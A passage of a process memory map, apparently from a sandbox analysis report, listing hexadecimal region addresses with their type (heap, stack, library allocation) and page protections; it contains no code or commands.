trusted library allocation
page read and write
2250C000
heap
page read and write
38B1000
heap
page read and write
42CC000
stack
page read and write
7FFD99900000
trusted library allocation
page execute and read and write
1060000
trusted library allocation
page read and write
6350000
trusted library allocation
page execute and read and write
52A6000
trusted library allocation
page read and write
22120000
heap
page read and write
8B0000
heap
page read and write
224E0000
heap
page read and write
7FF47748D000
trusted library allocation
page execute read
305497E000
stack
page read and write
38B2000
heap
page read and write
3E96000
trusted library allocation
page read and write
3001000
heap
page read and write
BA1000
unkown
page execute read
18788322000
trusted library allocation
page read and write
2FE7000
heap
page read and write
7F4000
heap
page read and write
25EB000
direct allocation
page read and write
5410000
heap
page read and write
7FFD99D56000
trusted library allocation
page read and write
2D68000
heap
page read and write
7FFD99B30000
trusted library allocation
page read and write
18784220000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
4F1A000
trusted library allocation
page read and write
2F6DF000
heap
page read and write
18788395000
trusted library allocation
page read and write
4B60000
heap
page execute and read and write
2F6C6000
heap
page read and write
3915000
heap
page read and write
FD916FB000
stack
page read and write
38E3000
heap
page read and write
5BE000
heap
page read and write
30A0000
trusted library allocation
page read and write
324D000
heap
page read and write
2840000
heap
page read and write
C6C000
heap
page read and write
187882A0000
trusted library allocation
page read and write
6B3C2000
unkown
page readonly
41E000
unkown
page read and write
11C9000
heap
page read and write
40A9000
trusted library allocation
page read and write
1C041000
heap
page read and write
A00000
heap
page read and write
18788870000
trusted library allocation
page read and write
2DAF000
stack
page read and write
2EAD1DA4000
trusted library allocation
page read and write
58FD000
direct allocation
page read and write
2EAC1CD0000
trusted library section
page read and write
187883CA000
trusted library allocation
page read and write
197000
stack